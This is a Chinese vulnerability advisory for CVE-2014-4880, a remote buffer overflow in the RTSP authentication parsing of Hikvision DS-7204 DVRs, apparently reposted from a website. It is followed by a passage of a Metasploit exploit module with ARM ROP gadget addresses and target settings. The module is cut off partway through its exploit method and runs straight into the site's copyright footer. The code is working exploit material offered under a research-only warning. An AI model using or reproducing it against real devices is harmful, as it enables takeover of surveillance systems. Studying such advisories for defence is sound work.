7204远程缓冲区溢出漏洞(CVE

发布日期:2014-11-24
更新日期:2014-11-27

受影响系统:
hikvision DVR DS-7204 2.2.10
描述:
BUGTRAQ  ID: 71300
 CVE(CAN) ID: CVE-2014-4880

Hikvision DVR DS-7204是硬盘录像机产品。

Hikvision DVR DS-7204(固件版本2.2.10)在RTSP请求基本身份验证解析代码的实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响设备上下文中执行任意代码。

<*来源:Mark Schloesser
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = NormalRanking

include Exploit::Remote::Tcp

def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Hikvision DVR RTSP Request Remote Code Execution',
      'Description'    => %q{
        This module exploits a buffer overflow in the RTSP request parsing
        code of Hikvision DVR appliances. The Hikvision DVR devices record
        video feeds of surveillance cameras and offer remote administration
        and playback of recorded footage.

The vulnerability is present in several models / firmware versions
        but due to the available test device this module only supports
        the DS-7204 model.
      },
      'Author'        =>
        [
          'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
        ],
      'License'        => MSF_LICENSE,
      'References'    =>
        [
          [ 'CVE', '2014-4880' ],
          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
        ],
      'Platform'      => 'linux',
      'Arch'          => ARCH_ARMLE,
      'Privileged'    => true,
      'Targets'        =>
        [
          #
          # ROP targets are difficult to represent in the hash, use callbacks instead
          #
          [ "DS-7204 Firmware V2.2.10 build 131009", {

# The callback handles all target-specific settings
            :callback => :target_ds7204_1,
              'g_adjustesp' => 0x002c828c,
              # ADD            SP, SP, #0x350
              # LDMFD          SP!, {R4-R6,PC}

'g_r3fromsp'  => 0x00446f80,
              # ADD            R3, SP, #0x60+var_58
              # BLX            R6

'g_blxr3_pop' => 0x00456360,
              # BLX            R3
              # LDMFD          SP!, {R1-R7,PC}

'g_popr3'    => 0x0000fe98,
              # LDMFD          SP!, {R3,PC}
          } ],

[ "Debug Target", {

# The callback handles all target-specific settings
            :callback => :target_debug

} ]

],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 19 2014'))

register_options(
      [
        Opt::RPORT(554)
      ], self.class)
  end

def exploit
    unless self.respond_to?(target[:callback])
      fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
    end

device_rop = self.send(target[:callback])

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/19fc11cdaeb651ec39ce6d882ffe11c4.html